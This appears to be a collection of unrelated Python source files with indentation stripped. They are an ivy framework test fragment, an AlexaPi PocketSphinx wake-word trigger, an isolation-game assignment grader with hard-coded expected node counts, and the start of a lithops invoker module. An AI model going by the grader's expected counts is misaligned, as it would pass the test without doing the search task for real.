dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# def test_framework_setting_with_threading(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# def thread_fn():
# ivy.set_framework('numpy')
# x_ = np.array([0., 1., 2.])
# for _ in range(2000):
# try:
# ivy.reduce_mean(x_)
# except TypeError:
# return False
# ivy.unset_framework()
# return True
#
# # get original framework string and array
# fws = ivy.current_framework_str()
# x = ivy.array([0., 1., 2.])
#
# # start numpy loop thread
# thread = threading.Thread(target=thread_fn)
# thread.start()
#
# # start local original framework loop
# ivy.set_framework(fws)
# for _ in range(2000):
# ivy.reduce_mean(x)
# ivy.unset_framework()
#
# assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
# def test_explicit_ivy_framework_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# # store original framework string and unset
# fw_str = ivy.current_framework_str()
# ivy.unset_framework()
#
# # set with explicit handle caught
# ivy_exp = ivy.get_framework(fw_str)
# assert ivy_exp.current_framework_str() == fw_str
#
# # assert backend implemented function is accessible
# assert 'array' in ivy_exp.__dict__
# assert callable(ivy_exp.array)
#
# # assert joint implemented function is also accessible
# assert 'cache_fn' in ivy_exp.__dict__
# assert callable(ivy_exp.cache_fn)
#
# # set global ivy to numpy
# ivy.set_framework('numpy')
#
# # assert the explicit handle is still unchanged
# assert ivy.current_framework_str() == 'numpy'
# assert ivy_exp.current_framework_str() == fw_str
#
# # unset global ivy from numpy
# ivy.unset_framework()
# def test_class_ivy_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# class ArrayGen:
#
# def __init__(self, ivyh):
# self._ivy = ivyh
#
# def get_array(self):
# return self._ivy.array([0., 1., 2.])
#
# # create instance
# ag = ArrayGen(ivy.get_framework())
#
# # create array from array generator
# x = ag.get_array()
#
# # verify this is not a numpy array
# assert not isinstance(x, np.ndarray)
#
# # change global framework to numpy
# ivy.set_framework('numpy')
#
# # create another array from array generator
# x = ag.get_array()
#
# # verify this is not still a numpy array
# assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# profiler
# def test_profiler(dev, call):
#
# # ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
#
# # log dir
# this_dir = os.path.dirname(os.path.realpath(__file__))
# log_dir = os.path.join(this_dir, '../log')
#
# # with statement
# with ivy.Profiler(log_dir):
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
#
# # start and stop methods
# profiler = ivy.Profiler(log_dir)
# profiler.start()
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# profiler.stop()
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
# @pytest.mark.parametrize(
# "x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_update(x_n_new, tensor_fn, dev, call):
# x_orig, new_val = x_n_new
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# new_val = tensor_fn(new_val, 'float32', dev)
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_update(x_orig, new_val)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_decrement(x_n_dec, tensor_fn, dev, call):
# x_orig, dec = x_n_dec
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# dec = tensor_fn(dec, 'float32', dev)
# new_val = x_orig - dec
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_decrement(x_orig, dec)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_increment(x_n_inc, tensor_fn, dev, call):
# x_orig, inc = x_n_inc
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# inc = tensor_fn(inc, 'float32', dev)
# new_val = x_orig + inc
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_increment(x_orig, inc)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
|
pocketsphinxtrigger.py
|
import os
import threading
import logging
import alsaaudio
from pocketsphinx import get_model_path
from pocketsphinx.pocketsphinx import Decoder
import alexapi.triggers as triggers
from .basetrigger import BaseTrigger
logger = logging.getLogger(__name__)
class PocketsphinxTrigger(BaseTrigger):
type = triggers.TYPES.VOICE
def __init__(self, config, trigger_callback):
super(PocketsphinxTrigger, self).__init__(config, trigger_callback, 'pocketsphinx')
self._enabled_lock = threading.Event()
self._disabled_sync_lock = threading.Event()
self._decoder = None
def setup(self):
# PocketSphinx configuration
ps_config = Decoder.default_config()
# Set recognition model to US
ps_config.set_string('-hmm', os.path.join(get_model_path(), self._tconfig['language']))
ps_config.set_string('-dict', os.path.join(get_model_path(), self._tconfig['dictionary']))
# Specify recognition key phrase
#ps_config.set_string('-keyphrase', self._tconfig['phrase'])
#ps_config.set_float('-kws_threshold', float(self._tconfig['threshold']))
### Multiple Hotwords
#ps_config.set_string('-inmic', 'yes')
ps_config.set_string('-kws', '/opt/AlexaPi/src/keyphrase.list')
# Hide the VERY verbose logging information when not in debug
if logging.getLogger('alexapi').getEffectiveLevel() != logging.DEBUG:
ps_config.set_string('-logfn', '/dev/null')
# Process audio chunk by chunk. On keyword detected perform action and restart search
self._decoder = Decoder(ps_config)
def run(self):
thread = threading.Thread(target=self.thread, args=())
thread.setDaemon(True)
thread.start()
def thread(self):
while True:
self._enabled_lock.wait()
# Enable reading microphone raw data
inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NORMAL, self._config['sound']['input_device'])
inp.setchannels(1)
inp.setrate(16000)
inp.setformat(alsaaudio.PCM_FORMAT_S16_LE)
inp.setperiodsize(1024)
self._decoder.start_utt()
triggered = False
#assistantTriggered = False
voice_command = ""
while not triggered:
if not self._enabled_lock.isSet():
break
# Read from microphone
_, buf = inp.read()
# Detect if keyword/trigger word was said
self._decoder.process_raw(buf, False, False)
triggered = self._decoder.hyp() is not None
# To avoid overflows close the microphone connection
inp.close()
self._decoder.end_utt()
self._disabled_sync_lock.set()
if triggered:
### Assistant Starts Here
try:
voice_command = self._decoder.hyp().hypstr
except:
voice_command = ""
self._trigger_callback(self, voice_command)
###
def enable(self):
self._enabled_lock.set()
self._disabled_sync_lock.clear()
def disable(self):
self._enabled_lock.clear()
self._disabled_sync_lock.wait()
|
agent_test.py
|
"""
This file contains test cases to verify the correct implementation of the
functions required for this project including minimax, alphabeta, and iterative
deepening. The heuristic function is tested for conformance to the expected
interface, but cannot be automatically assessed for correctness.
STUDENTS SHOULD NOT NEED TO MODIFY THIS CODE. IT WOULD BE BEST TO TREAT THIS
FILE AS A BLACK BOX FOR TESTING.
"""
import random
import unittest
import timeit
import sys
import isolation
import game_agent
from collections import Counter
from copy import deepcopy
from copy import copy
from functools import wraps
from queue import Queue
from threading import Thread
from multiprocessing import TimeoutError
from queue import Empty as QueueEmptyError
from importlib import reload
WRONG_MOVE = """
The {} function failed because it returned a non-optimal move at search depth {}.
Valid choices: {}
Your selection: {}
"""
WRONG_NUM_EXPLORED = """
Your {} search visited the wrong nodes at search depth {}. If the number
of visits is too large, make sure that iterative deepening is only
running when the `iterative` flag is set in the agent constructor.
Max explored size: {}
Number you explored: {}
"""
UNEXPECTED_VISIT = """
Your {} search did not visit the number of expected unique nodes at search
depth {}.
Max explored size: {}
Number you explored: {}
"""
ID_FAIL = """
Your agent explored the wrong number of nodes using Iterative Deepening and
minimax. Remember that ID + MM should check every node in each layer of the
game tree before moving on to the next layer.
"""
INVALID_MOVE = """
Your agent returned an invalid move. Make sure that your function returns
a selection when the search times out during iterative deepening.
Valid choices: {!s}
Your choice: {}
"""
TIMER_MARGIN = 15 # time (in ms) to leave on the timer to avoid timeout
def curr_time_millis():
"""Simple timer to return the current clock time in milliseconds."""
return 1000 * timeit.default_timer()
def handler(obj, testcase, queue):
"""Handler to pass information between threads; used in the timeout
function to abort long-running (i.e., probably hung) test cases.
"""
try:
queue.put((None, testcase(obj)))
except:
queue.put((sys.exc_info(), None))
def timeout(time_limit):
"""Function decorator for unittest test cases to specify test case timeout.
The timer mechanism works by spawning a new thread for the test to run in
and using the timeout handler for the thread-safe queue class to abort and
kill the child thread if it doesn't return within the timeout.
It is not safe to access system resources (e.g., files) within test cases
wrapped by this timer.
"""
def wrapUnitTest(testcase):
@wraps(testcase)
def testWrapper(self):
queue = Queue()
try:
p = Thread(target=handler, args=(self, testcase, queue))
p.daemon = True
p.start()
err, res = queue.get(timeout=time_limit)
p.join()
if err:
raise err[0](err[1]).with_traceback(err[2])
return res
except QueueEmptyError:
raise TimeoutError("Test aborted due to timeout. Test was " +
"expected to finish in less than {} second(s).".format(time_limit))
return testWrapper
return wrapUnitTest
def makeEvalTable(table):
"""Use a closure to create a heuristic function that returns values from
a table that maps board locations to constant values. This supports testing
the minimax and alphabeta search functions.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
row, col = game.get_player_location(player)
return table[row][col]
return score
def makeEvalStop(limit, timer, value=None):
"""Use a closure to create a heuristic function that forces the search
timer to expire when a fixed number of node expansions have been perfomred
during the search. This ensures that the search algorithm should always be
in a predictable state regardless of node expansion order.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if timer.time_left() < 0:
raise TimeoutError("Timer expired during search. You must " +
"return an answer before the timer reaches 0.")
if limit == game.counts[0]:
timer.time_limit = 0
return 0
return score
def makeBranchEval(first_branch):
"""Use a closure to create a heuristic function that evaluates to a nonzero
score when the root of the search is the first branch explored, and
otherwise returns 0. This heuristic is used to force alpha-beta to prune
some parts of a game tree for testing.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if not first_branch:
first_branch.append(game.root)
if game.root in first_branch:
return 1.
return 0.
return score
class CounterBoard(isolation.Board):
"""Subclass of the isolation board that maintains counters for the number
of unique nodes and total nodes visited during depth first search.
Some functions from the base class must be overridden to maintain the
counters during search.
"""
def __init__(self, *args, **kwargs):
super(CounterBoard, self).__init__(*args, **kwargs)
self.counter = Counter()
self.visited = set()
self.root = None
def copy(self):
new_board = CounterBoard(self.__player_1__, self.__player_2__,
width=self.width, height=self.height)
new_board.move_count = self.move_count
new_board.__active_player__ = self.__active_player__
new_board.__inactive_player__ = self.__inactive_player__
new_board.__last_player_move__ = copy(self.__last_player_move__)
new_board.__player_symbols__ = copy(self.__player_symbols__)
new_board.__board_state__ = deepcopy(self.__board_state__)
new_board.counter = self.counter
new_board.visited = self.visited
new_board.root = self.root
return new_board
def forecast_move(self, move):
self.counter[move] += 1
self.visited.add(move)
new_board = self.copy()
new_board.apply_move(move)
if new_board.root is None:
new_board.root = move
return new_board
@property
def counts(self):
""" Return counts of (total, unique) nodes visited """
return sum(self.counter.values()), len(self.visited)
class Project1Test(unittest.TestCase):
def initAUT(self, depth, eval_fn, iterative=False,
method="minimax", loc1=(3, 3), loc2=(0, 0), w=7, h=7):
"""Generate and initialize player and board objects to be used for
testing.
"""
reload(game_agent)
agentUT = game_agent.CustomPlayer(depth, eval_fn, iterative, method)
board = CounterBoard(agentUT, 'null_agent', w, h)
board.apply_move(loc1)
board.apply_move(loc2)
return agentUT, board
@timeout(5)
# @unittest.skip("Skip eval function test.") # Uncomment this line to skip test
def test_heuristic(self):
""" Test output interface of heuristic score function interface."""
player1 = "Player1"
player2 = "Player2"
p1_location = (0, 0)
p2_location = (1, 1) # top left corner
game = isolation.Board(player1, player2)
game.apply_move(p1_location)
game.apply_move(p2_location)
self.assertIsInstance(game_agent.custom_score(game, player1), float,
"The heuristic function should return a floating point")
timeout(5)
# @unittest.skip("Skip simple minimax test.") # Uncomment this line to skip test
def test_minimax_interface(self):
""" Test CustomPlayer.minimax interface with simple input """
h, w = 7, 7 # board size
test_depth = 1
starting_location = (5, 3)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "minimax"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
v, _ = agentUT.minimax(next_state, test_depth)
self.assertTrue(type(v) == float,
("Minimax function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
timeout(5)
# @unittest.skip("Skip alphabeta test.") # Uncomment this line to skip test
def test_alphabeta_interface(self):
""" Test CustomPlayer.alphabeta interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "alphabeta"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
v, _ = agentUT.alphabeta(next_state, test_depth)
self.assertTrue(type(v) == float,
("Alpha Beta function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
@timeout(5)
# @unittest.skip("Skip get_move test.") # Uncomment this line to skip test
def test_get_move_interface(self):
""" Test CustomPlayer.get_move interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "minimax"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
# Test that get_move returns a legal choice on an empty game board
board = isolation.Board(agentUT, 'null_agent', w, h)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on an " +
"empty board. It should return coordinates on the " +
"game board for the location of the agent's next " +
"move. The move must be one of the legal moves on " +
"the current game board."))
# Test that get_move returns a legal choice for first move as player 2
board = isolation.Board('null_agent', agentUT, w, h)
board.apply_move(starting_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed making the first " +
"move as player 2 on a new board. It should return " +
"coordinates on the game board for the location " +
"of the agent's next move. The move must be one " +
"of the legal moves on the current game board."))
# Test that get_move returns a legal choice after first move
board = isolation.Board(agentUT, 'null_agent', w, h)
board.apply_move(starting_location)
board.apply_move(adversary_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on a " +
"game in progress. It should return coordinates on" +
"the game board for the location of the agent's " +
"next move. The move must be one of the legal moves " +
"on the current game board."))
@timeout(5)
# @unittest.skip("Skip minimax test.") # Uncomment this line to skip test
def test_minimax(self):
""" Test CustomPlayer.minimax
This test uses a scoring function that returns a constant value based
on the location of the search agent on the board to force minimax to
choose a branch that visits those cells at a specific fixed-depth.
If minimax is working properly, it will visit a constant number of
nodes during the search and return one of the acceptable legal moves.
"""
h, w = 7, 7 # board size
starting_location = (2, 3)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "minimax"
# The agent under test starts at position (2, 3) on the board, which
# gives eight (8) possible legal moves [(0, 2), (0, 4), (1, 1), (1, 5),
# (3, 1), (3, 5), (4, 2), (4, 4)]. The search function will pick one of
# those moves based on the estimated score for each branch. The value
# only changes on odd depths because even depths end on when the
# adversary has initiative.
value_table = [[0] * w for _ in range(h)]
value_table[1][5] = 1 # depth 1 & 2
value_table[4][3] = 2 # depth 3 & 4
value_table[6][6] = 3 # depth 5
heuristic = makeEvalTable(value_table)
# These moves are the branches that will lead to the cells in the value
# table for the search depths.
expected_moves = [set([(1, 5)]),
set([(3, 1), (3, 5)]),
set([(3, 5), (4, 2)])]
# Expected number of node expansions during search
counts = [(8, 8), (24, 10), (92, 27), (418, 32), (1650, 43)]
# Test fixed-depth search; note that odd depths mean that the searching
# player (student agent) has the last move, while even depths mean that
# the adversary has the last move before calling the heuristic
# evaluation function.
for idx in range(5):
test_depth = idx + 1
agentUT, board = self.initAUT(test_depth, heuristic,
iterative_search, method,
loc1=starting_location,
loc2=adversary_location)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
_, move = agentUT.minimax(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, expected_moves[idx // 2], WRONG_MOVE.format(
method, test_depth, expected_moves[idx // 2], move))
@timeout(20)
# @unittest.skip("Skip alpha-beta test.") # Uncomment this line to skip test
def test_alphabeta(self):
""" Test CustomPlayer.alphabeta
This test uses a scoring function that returns a constant value based
on the branch being searched by alphabeta in the user agent, and forces
the search to prune on every other branch it visits. By using a huge
board where the players are too far apart to interact and every branch
has the same growth factor, the expansion and pruning must result in
an exact number of expanded nodes.
"""
h, w = 101, 101 # board size
starting_location = (50, 50)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "alphabeta"
# The agent under test starts in the middle of a huge board so that
# every branch has the same number of possible moves, so pruning any
# branch has the same effect during testing
# These are the expected number of node expansions for alphabeta search
# to explore the game tree to fixed depth. The custom eval function
# used for this test ensures that some branches must be pruned, while
# the search should still return an optimal move.
counts = [(8, 8), (17, 10), (74, 42), (139, 51), (540, 119)]
for idx in range(len(counts)):
test_depth = idx + 1 # pruning guarantee requires min depth of 3
first_branch = []
heuristic = makeBranchEval(first_branch)
agentUT, board = self.initAUT(test_depth, heuristic,
iterative_search, method,
loc1=starting_location,
loc2=adversary_location,
w=w, h=h)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
_, move = agentUT.alphabeta(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, first_branch, WRONG_MOVE.format(
method, test_depth, first_branch, move))
@timeout(20)
# @unittest.skip("Skip iterative deepening test.") # Uncomment this line to skip test
def test_get_move(self):
""" Test iterative deepening in CustomPlayer.get_move by placing an
agent on the game board and performing ID minimax search, which
should visit a specific number of unique nodes while expanding. By
forcing the search to timeout when a predetermined number of nodes
have been expanded, we can then verify that the expected number of
unique nodes have been visited.
"""
class DynamicTimer():
"""Dynamic Timer allows the time limit to be changed after the
timer is initialized so that the search timeout can be triggered
before the timer actually expires. This allows the timer to expire
when an event occurs, regardless of the clock time required until
the event happens.
"""
def __init__(self, time_limit):
self.time_limit = time_limit
self.start_time = curr_time_millis()
def time_left(self):
return self.time_limit - (curr_time_millis() - self.start_time)
w, h = 11, 11 # board size
adversary_location = (0, 0)
method = "minimax"
# The agent under test starts at the positions indicated below, and
# performs an iterative deepening minimax search (minimax is easier to
# test because it always visits all nodes in the game tree at every
# level).
origins = [(2, 3), (6, 6), (7, 4), (4, 2), (0, 5), (10, 10)]
exact_counts = [(8, 8), (32, 10), (160, 39), (603, 35), (1861, 54), (3912, 62)]
for idx in range(len(origins)):
# set the initial timer high enough that the search will not
# timeout before triggering the dynamic timer to halt by visiting
# the expected number of nodes
time_limit = 1e4
timer = DynamicTimer(time_limit)
eval_fn = makeEvalStop(exact_counts[idx][0], timer, time_limit)
agentUT, board = self.initAUT(-1, eval_fn, True, method,
origins[idx], adversary_location,
w, h)
legal_moves = board.get_legal_moves()
chosen_move = agentUT.get_move(board, legal_moves, timer.time_left)
diff_total = abs(board.counts[0] - exact_counts[idx][0])
diff_unique = abs(board.counts[1] - exact_counts[idx][1])
self.assertTrue(diff_total <= 1 and diff_unique == 0, ID_FAIL)
self.assertTrue(chosen_move in legal_moves, INVALID_MOVE.format(
legal_moves, chosen_move))
if __name__ == '__main__':
unittest.main()
|
invokers.py
|
#
# (C) Copyright IBM Corp. 2020
# (C) Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import time
import random
import queue
import shutil
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
from lithops.future import ResponseFuture
from lithops.config import extract_storage_config
from lithops.version import __version__ as lithops_version
from lithops.utils import version_str, is_lithops_worker, iterchunks
from lithops.constants import LOGGER_LEVEL, LOGS_DIR,\
LOCALHOST, SERVERLESS, STANDALONE
from lithops.util.metrics import PrometheusExporter
logger = logging.getLogger(__name__)
def create_invoker(config, executor_id, internal_storage,
compute_handler, job_monitor):
"""
Creates the appropriate invoker based on the backend type
"""
if compute_handler.get_backend_type() == 'batch':
return BatchInvoker(
config,
executor_id,
internal_storage,
compute_handler,
job_monitor
)
elif compute_handler.get_backend_type() == 'faas':
return FaaSInvoker(
config,
executor_id,
internal_storage,
compute_handler,
job_monitor
)
class Invoker:
"""
Abstract invoker class
"""
def __init__(self, config, executor_id, internal_storage, compute_handler, job_monitor):
log_level = logger.getEffectiveLevel()
self.log_active = log_level != logging.WARNING
self.log_level = LOGGER_LEVEL if not self.log_active else log_level
self.config = config
self.executor_id = executor_id
self.storage_config = extract_storage_config(self.config)
self.internal_storage = internal_storage
self.compute_handler = compute_handler
self.is_lithops_worker = is_lithops_worker()
self.job_monitor = job_monitor
prom_enabled = self.config['lithops'].get('telemetry', False)
prom_config = self.config.get('prometheus', {})
self.prometheus = PrometheusExporter(prom_enabled, prom_config)
self.mode = self.config['lithops']['mode']
self.backend = self.config['lithops']['backend']
self.customized_runtime = self.config['lithops'].get('customized_runtime', False)
self.runtime_name = self.config[self.backend]['runtime']
self.max_workers = self.config[self.backend].get('max_workers')
logger.debug(f'ExecutorID {self.executor_id} - Invoker initialized.'
f' Max workers: {self.max_workers}')
